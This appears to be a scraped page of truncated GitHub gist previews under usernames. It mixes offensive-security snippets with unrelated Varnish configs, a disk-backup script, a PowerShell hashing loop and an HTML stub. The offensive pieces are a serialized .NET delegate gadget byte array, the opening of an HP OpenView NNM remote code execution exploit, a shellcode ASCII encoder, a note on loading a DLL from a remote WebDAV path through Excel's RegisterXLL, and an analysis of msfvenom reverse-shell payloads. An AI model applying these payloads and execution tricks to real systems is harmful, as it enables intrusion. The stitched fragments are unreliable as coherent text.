dave5623

var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,

mgeeky

#!/usr/bin/python
# HP OpenView NNM B.07.50 Remote Code Execution exploit
# by Mariusz B. / mgeeky, 17'

import struct
import socket

HOST = '192.168.XXX.YYY'
PORT = 7510

mgeeky

#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` 
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving 

ryhanson

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

section-io-gists

# Note: You will want to add the snippet: `include "pagespeed-requirement.vcl";` above your `vcl_recv` in the default.vcl file.

sub vcl_recv {
    call pagespeed_capability_detection;
}

# Function derived from requirements here https://modpagespeed.com/doc/downstream-caching#ps-capabilitylist
# Additional detection logic for crawlers, tablet and mobile devices.
sub pagespeed_capability_detection {
    if (req.http.User-Agent ~ "(?i)Chrome/[3][2-9]+\.|Chrome/[4-9][0-9]+\.|Chrome/[0-9]{3,}\.") {

mgeeky

Looking for WaitForSingleObject call within modern msfvenom generated payload.

---

Abstract

This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching issues like stack alignment, WaitForSingleObject locating & patching. It has been written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching problem of finding this particular Windows API. Since RE is one of my stronger FU's I decided to write down my explanation of the subject.

Contents:

dvershinin

vcl 4.0;

import std;
# The minimal Varnish version is 4.0
# For SSL offloading, pass the following header in your proxy server or load balancer: 'X-Forwarded-Proto: https'

backend default {
    .host = "localhost";
    .port = "8080";
    .first_byte_timeout = 600s;

c5e3

#!/bin/bash

# restore with the following command:
# gunzip --stdout <filename>.img.gz | dd bs=10M of=/dev/sdX

# pv(1) is optional and provides a progress bar
# just remove it from the pipe, when you don't want it

DATE=$(date +"%Y-%m-%d_%H-%M")
GREEN='\033[1;32m'

msuiche

dir . | Foreach-Object{
    $file = $_
    $hash = Get-FileHash $file -Algorithm MD5
    $fileinfo = Get-Item $file

    New-Object -TypeName PSObject -Property @{
        VersionInfo = $fileinfo.VersionInfo
        LastWriteTime = $fileinfo.LastWriteTime
        Length = $fileinfo.Length
        Algorithm = $hash.Algorithm

koto

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>JS Bin</title>
</head>
<body>